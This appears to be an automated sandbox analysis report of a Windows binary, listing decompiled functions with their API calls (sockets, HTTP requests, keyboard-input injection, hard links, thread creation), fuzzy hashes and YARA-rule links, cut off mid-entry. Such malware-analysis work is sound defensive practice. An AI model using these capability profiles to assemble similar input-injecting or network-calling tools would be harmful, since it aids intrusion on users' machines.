API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: a953e71e56024ea37a903855bef77569ba8d1b970a30896b80d3211637cb3462
Instruction ID: 2f4f88b86d193293ca236daac87a7fb71db27aa2fefe95110fd254aaffc30571
Opcode Fuzzy Hash: a953e71e56024ea37a903855bef77569ba8d1b970a30896b80d3211637cb3462
Instruction Fuzzy Hash: A5516C71904711AFD310EF64DC85F6BBBE8AF94710F10492DF596972A1EB70AA04CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00A49A63, Relevance: 6.1, APIs: 4, Instructions: 142COMMON

Download Yara Rule

APIs

GetWindowRect.USER32 ref: 00A49AD2
ScreenToClient.USER32 ref: 00A49B05
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00A49B72

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 67f00ccdec994a627a29ab72523b4637834d277b225c147a13fc4b1048463e9f
Instruction ID: e5aa503a490e0a52d6ed5c69c925327fbd94b3107d03f803ef8d715553d3fa59
Opcode Fuzzy Hash: 67f00ccdec994a627a29ab72523b4637834d277b225c147a13fc4b1048463e9f
Instruction Fuzzy Hash: AB512C38A00209EFDF10DF68D981AAF7BB5FB95360F148269F8159B290D731AD52CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A36CBD, Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00A36CE4
WSAGetLastError.WSOCK32(00000000), ref: 00A36CF4
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00A36D58
WSAGetLastError.WSOCK32(00000000), ref: 00A36D64

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: 8e91fcd3e300d5e0041ebeecfdc0d091dd577c8766a5c3af15712f8a9782ddc4
Instruction ID: 0260baadac6e015db61e00973cac6865526f727a62e953ea027e92128d6783b5
Opcode Fuzzy Hash: 8e91fcd3e300d5e0041ebeecfdc0d091dd577c8766a5c3af15712f8a9782ddc4
Instruction Fuzzy Hash: 5F419374B40600BFEB10AF24DC8AF7A77E59F84B10F44801CFA5A9B2D3DA719D018792

Uniqueness

Uniqueness Score: -1.00%

Function 00A2BA5F, Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00A2BB09
GetLastError.KERNEL32(?,00000000), ref: 00A2BB2F
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00A2BB54
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00A2BB80

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 18502f848a9880065163c9e298b8da4e5044f3ee8d94d78d2045594b62590978
Instruction ID: cfb71a2e790aed5f2a9df4877099fa4073d256123b4016a6d25dddbcb7fc2374
Opcode Fuzzy Hash: 18502f848a9880065163c9e298b8da4e5044f3ee8d94d78d2045594b62590978
Instruction Fuzzy Hash: 53410939600A10DFCB11EF19D589F5DBBE1EF89710B198498E84A9B762CB34FD01CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00A48AC0, Relevance: 6.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00A48B4D

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 071368e8d653e9da8921afa5a0c5e2a3fea85229241100e9f516f6cd871c4f89
Instruction ID: e825837eff7fdfd3a6631f8b64ea232a19e7acd1396c84df737209ab80d8b34b
Opcode Fuzzy Hash: 071368e8d653e9da8921afa5a0c5e2a3fea85229241100e9f516f6cd871c4f89
Instruction Fuzzy Hash: 2B3105BC641204BFEF20DF58EC45FAD37A0EB86360F244516FA51D62A0CF39A9428751

Uniqueness

Uniqueness Score: -1.00%

Function 00A21121, Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,?,00000011,00000001), ref: 00A21176
SetKeyboardState.USER32(00000080), ref: 00A21192
PostMessageW.USER32 ref: 00A211F1
SendInput.USER32(00000001,00000000,0000001C,?,00000011,00000001), ref: 00A21243

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 5723ddfa473d95066f9e4b3650613964a797b5bdd901db8d35d92fc2d59571de
Instruction ID: 7ea343ea81e6c63c4a44d05ffb81b27480b238a7292633aeaa98bf250584ed00
Opcode Fuzzy Hash: 5723ddfa473d95066f9e4b3650613964a797b5bdd901db8d35d92fc2d59571de
Instruction Fuzzy Hash: 14310931940228ADFB20CBADAC05BFA7B79AB66321F14473FF280910D1C335896587A1

Uniqueness

Uniqueness Score: -1.00%

Function 00A4ADF1, Relevance: 6.1, APIs: 4, Instructions: 107windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32 ref: 00A4AE1A
GetWindowRect.USER32 ref: 00A4AE90
PtInRect.USER32(?,?,?), ref: 00A4AEA0
MessageBeep.USER32(00000000), ref: 00A4AF11

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 794d8c20857efea11b0472b6d8d2fd0a8eb0ee4935abe80e283da5302b1ed162
Instruction ID: cdd960e667a47287311443bc89fe9fa0d633c06125fe220e467bce8d4c38519b
Opcode Fuzzy Hash: 794d8c20857efea11b0472b6d8d2fd0a8eb0ee4935abe80e283da5302b1ed162
Instruction Fuzzy Hash: DD41B178640129DFDB11CF98C885AA9BBF5FFE9750F1481A9E428CB351C731A902CF92

Uniqueness

Uniqueness Score: -1.00%

Function 00A47500, Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,?,00000030), ref: 00A475C0
IsMenu.USER32(?), ref: 00A475D8
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00A47620
DrawMenuBar.USER32 ref: 00A47633

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$Item$DrawInfoInsert
String ID:
API String ID: 3076010158-0
Opcode ID: f1bbdc815c248f659bf3583b051a368c8642d76fd1eda7ad51e7fae52f07b2f3
Instruction ID: 1678cce725a3ea8256afd8f0acf561fdb06a1b7a6d6b7ecb6702434cd0e5ab1c
Opcode Fuzzy Hash: f1bbdc815c248f659bf3583b051a368c8642d76fd1eda7ad51e7fae52f07b2f3
Instruction Fuzzy Hash: 89417B79A00688EFDB10DF94D884EAEBBF9FB45354F058029F9559B250C731AD01CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 009F59AB, Relevance: 6.1, APIs: 4, Instructions: 104COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,3D1738B0,00000000,00000000,00000000,00000000,00000012,00000000,00000000,?,?,009F5ACF,00000000,00000001,00000000,00000000), ref: 009F59EB
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,?,00000000,?,00000001,00000000,?,?,009E3E75,00000000), ref: 009F5A6C
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,009E3E75,00000000,00000004,00000000,00000001,?,?,?,?), ref: 009F5A7E
__freea.LIBCMT ref: 009F5A87

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$StringType__freea
String ID:
API String ID: 3692439017-0
Opcode ID: 0efa311688d0c3987b18efdf68597741a99921d43ff14a7a3db337197b135beb
Instruction ID: 019310108935a1a455f189b1f45809e77349b7b86389b2497296c491a97132e2
Opcode Fuzzy Hash: 0efa311688d0c3987b18efdf68597741a99921d43ff14a7a3db337197b135beb
Instruction Fuzzy Hash: DE319F7250055DAFDF20DF95EC84DBB7BACEB49321B61022AFB08D6161D6318D61CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A45175, Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00A45189

Part of subcall function 00A2387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00A23897
Part of subcall function 00A2387D: GetCurrentThreadId.KERNEL32 ref: 00A2389E
Part of subcall function 00A2387D: AttachThreadInput.USER32(00000000,?,00A252A7), ref: 00A238A5

GetCaretPos.USER32(?), ref: 00A4519A
ClientToScreen.USER32 ref: 00A451D5
GetForegroundWindow.USER32 ref: 00A451DB

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: cddae810fd11406a6ae81669bd304df80b0d1aecb3d7c692daf025b60dd2ccc6
Instruction ID: ca4d0da79b0c9512b69575285b777d3f3b508f69eec61f129eb841d75e76b55c
Opcode Fuzzy Hash: cddae810fd11406a6ae81669bd304df80b0d1aecb3d7c692daf025b60dd2ccc6
Instruction Fuzzy Hash: 4A312D76D00108AFDB00EFA5C985EEFB7F9EF98300F10406AE415E7242EA759E45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A31B21, Relevance: 6.1, APIs: 4, Instructions: 92networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00A31B40
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A31B66
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00A31B96
InternetCloseHandle.WININET(00000000), ref: 00A31BDD

Part of subcall function 00A32777: GetLastError.KERNEL32(?,?,00A31B0B,00000000,00000000,00000001), ref: 00A3278C
Part of subcall function 00A32777: SetEvent.KERNEL32(?,?,00A31B0B,00000000,00000000,00000001), ref: 00A327A1

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-0
Opcode ID: e36a502cfbe9e88cc4b0d33208d27cac0f55e612acc18059b123785d20b425a6
Instruction ID: ab93da46a36812fda34bc5adf4f1f69887c53f1ed423d01cf4bad84f69e3d275
Opcode Fuzzy Hash: e36a502cfbe9e88cc4b0d33208d27cac0f55e612acc18059b123785d20b425a6
Instruction Fuzzy Hash: EC21D1B6600208BEEB11DFA1DCC5EFBB7BCEB8A798F10002AF105A6540EA359D059770

Uniqueness

Uniqueness Score: -1.00%

Function 00A1B6AF, Relevance: 6.1, APIs: 4, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00A1B6C7
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00A1B6E4
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00A1B71C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00A1B742

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow
String ID:
API String ID: 2796087071-0
Opcode ID: 4e0c035470fa68c1801c8cf514c4e65db64add3d17c436f08737bb7f0fca3d3e
Instruction ID: b3aae10a0500660a97e0aa7682599973fa774505cc3f1ad058fa49ce4e3f7a07
Opcode Fuzzy Hash: 4e0c035470fa68c1801c8cf514c4e65db64add3d17c436f08737bb7f0fca3d3e
Instruction Fuzzy Hash: 9021D735605284BBEB259B799C49EBBBBA8DF89750F104039F805CA1A1EB71DC819660

Uniqueness

Uniqueness Score: -1.00%

Function 00A4C788, Relevance: 6.1, APIs: 4, Instructions: 86windowCOMMON

Download Yara Rule

APIs

Part of subcall function 009C2612: GetWindowLongW.USER32 ref: 009C2623

GetCursorPos.USER32(?), ref: 00A4C7C2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,009FBBFB,?,?,?,?,?), ref: 00A4C7D7
GetCursorPos.USER32(?), ref: 00A4C824
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,009FBBFB,?,?,?), ref: 00A4C85E

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: cc2aafce6ce4170316b54ffd558aa6f40032fd93737292b39ab40e9e0c00b7f5
Instruction ID: 6f1dd1b05ed30e481903249726432e9ffc2ca7175f9dd5caf32a1998250c018b
Opcode Fuzzy Hash: cc2aafce6ce4170316b54ffd558aa6f40032fd93737292b39ab40e9e0c00b7f5
Instruction Fuzzy Hash: 9331B439601018AFDB15CFA8CC98EFA7BB9EF8A321F144069F5098B161D7329D51DF60

Uniqueness

Uniqueness Score: -1.00%

Function 00A31A5B, Relevance: 6.1, APIs: 4, Instructions: 81networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00A31A97

Part of subcall function 00A31B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00A31B40
Part of subcall function 00A31B21: InternetCloseHandle.WININET(00000000), ref: 00A31BDD

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: a6d493747fde3880650315bd0752a5ce5bff612c019ca406274d22addd8cef46
Instruction ID: 16e063ed4ec1f6c08c6a33cd570050d9c0e3b7d38788fa24fe56d2df39a41083
Opcode Fuzzy Hash: a6d493747fde3880650315bd0752a5ce5bff612c019ca406274d22addd8cef46
Instruction Fuzzy Hash: 2721F036200600BFEB11DFA0CC05FBBFBADFB85701F10402AF60596550E736A411DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A1E1AF, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 73stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00A1F5AD: lstrlenW.KERNEL32(?,00000002,?,000000FF,000000EF,?,00A1E1C4,000000FF,?,?,00A1EFB7,?,000000EF,00000119), ref: 00A1F5BC
Part of subcall function 00A1F5AD: lstrcpyW.KERNEL32 ref: 00A1F5E2
Part of subcall function 00A1F5AD: lstrcmpiW.KERNEL32(00000000,?,00A1E1C4,000000FF,?,?,00A1EFB7,?,000000EF,00000119), ref: 00A1F613

lstrlenW.KERNEL32(000000FF,00000002,?,000000FF,?,?,00A1EFB7,?,000000EF,00000119), ref: 00A1E1DD
lstrcpyW.KERNEL32 ref: 00A1E203
lstrcmpiW.KERNEL32(00000002,cdecl,?,00A1EFB7,?,000000EF,00000119), ref: 00A1E237

Strings

cdecl, xrefs: 00A1E22E

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 39e08c4bd2bda3c4c8bb659d73912dfe8d138bec518553e1b64c13cfbd15176d
Instruction ID: 004306284c8f45c0e80661a48440ddce7e90baac67ebec785eb8b8027cc94133
Opcode Fuzzy Hash: 39e08c4bd2bda3c4c8bb659d73912dfe8d138bec518553e1b64c13cfbd15176d
Instruction Fuzzy Hash: AF11727A200245EEDB15EF64DC55DFA77ACFF86350B40412AF906CA150EB729491D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 009F9BA8, Relevance: 6.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,00000000,000000FF,?,?,?,?,?,00000000,?,?,009F8984,?,?), ref: 009F9BC4
WideCharToMultiByte.KERNEL32(00000000,00000000,013B2DF8,000000FF,00000000,00000000,00000000,00000000,?,?,009F8984,?,?,?,009F421C,00A5E500), ref: 009F9BEF
_free.LIBCMT ref: 009F9C11
_free.LIBCMT ref: 009F9C2C

Part of subcall function 009E2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,009E9C64), ref: 009E2FA9
Part of subcall function 009E2F95: GetLastError.KERNEL32(00000000,?,009E9C64), ref: 009E2FBB

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapLast
String ID:
API String ID: 3523658405-0
Opcode ID: 67582e97b20a64ade04b96ce67c4092dc97d9b263e138b5ac5680ec790c17dec
Instruction ID: 007c845f26d4d320a4a4fcecb11a201d0a85ee6718d59f4bac6540e94da341f5
Opcode Fuzzy Hash: 67582e97b20a64ade04b96ce67c4092dc97d9b263e138b5ac5680ec790c17dec
Instruction Fuzzy Hash: 51118632505148BEDB219BA69D09F7B7BBCDBC2B21B20465EF258A60D0DA315941D720

Uniqueness

Uniqueness Score: -1.00%

Function 009F196E, Relevance: 6.1, APIs: 4, Instructions: 71COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?), ref: 009F19A8
SetFilePointerEx.KERNEL32(00000000,00000000,?,?,?,?,?,?), ref: 009F19BC
GetLastError.KERNEL32(?,?,?), ref: 009F19C2

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: FilePointer$ErrorLast
String ID:
API String ID: 142388799-0
Opcode ID: ae06914a6de726b2424fbf5665ae6e09dfd3ad9ce3b66e575498f7a2f2731e9e
Instruction ID: 2dac49b5db8166b8c00f7090a24f4b850079346e8bbc14c8c6268c6f0823e49a
Opcode Fuzzy Hash: ae06914a6de726b2424fbf5665ae6e09dfd3ad9ce3b66e575498f7a2f2731e9e
Instruction Fuzzy Hash: 8411C47660125DFEDB219BE9EC41FFE372CEB82724F100255F624A61D1DBB5E84097A0

Uniqueness

Uniqueness Score: -1.00%

Function 009F5332, Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 009F5351

Part of subcall function 009E594C: __FF_MSGBANNER.LIBCMT ref: 009E5963
Part of subcall function 009E594C: RtlAllocateHeap.NTDLL(013A0000,00000000,?,00000000,?,?,?,009E1013,?), ref: 009E598F

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: e474b6f1fd64a552e914a84053f65b53f50256198fbb3b07b122ffdfd779f066
Instruction ID: b6c77c40ff1f9fa820b1c2082d9c5c5b7db3b8a84c2f868644452bb376492d3c
Opcode Fuzzy Hash: e474b6f1fd64a552e914a84053f65b53f50256198fbb3b07b122ffdfd779f066
Instruction Fuzzy Hash: 70112772404919EECB223FB9EC0577E3B9C9F513F0B21042AF70896091CEF64D819390

Uniqueness

Uniqueness Score: -1.00%

Function 00A45F98, Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32 ref: 00A46007
SetWindowLongW.USER32 ref: 00A46021
SetWindowLongW.USER32 ref: 00A4602F
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00A4603D

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 9bee73901e878b232e4a172bf67a8be736245ff0654c01e350a5a08d72a81453
Instruction ID: 9a366b4e8c61425a0acd24d482635e07aa39322053250999c6414bb6c764bdd1
Opcode Fuzzy Hash: 9bee73901e878b232e4a172bf67a8be736245ff0654c01e350a5a08d72a81453
Instruction Fuzzy Hash: F311D039604520AFDB04AB29DC05FBA77A9EFC6320F14811DF91AC72E2CB74AD01C796

Uniqueness

Uniqueness Score: -1.00%

Function 009E5EFC, Relevance: 6.1, APIs: 4, Instructions: 68threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32 ref: 009E5F5A
GetLastError.KERNEL32(?,?,Function_00026007,00000000,00000004,00000000,?,?,?,?,00A329C0,00A32A60,00000000,?,?,?), ref: 009E5F69
_free.LIBCMT ref: 009E5F72
ResumeThread.KERNEL32(00000000,?,?,Function_00026007,00000000,00000004,00000000,?,?,?,?,00A329C0,00A32A60,00000000), ref: 009E5F8C

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$CreateErrorLastResume_free
String ID:
API String ID: 1510559479-0
Opcode ID: bf8fc115609ae640b4760f629165e2786479c63f27bb74eddba34c72e15f8edb
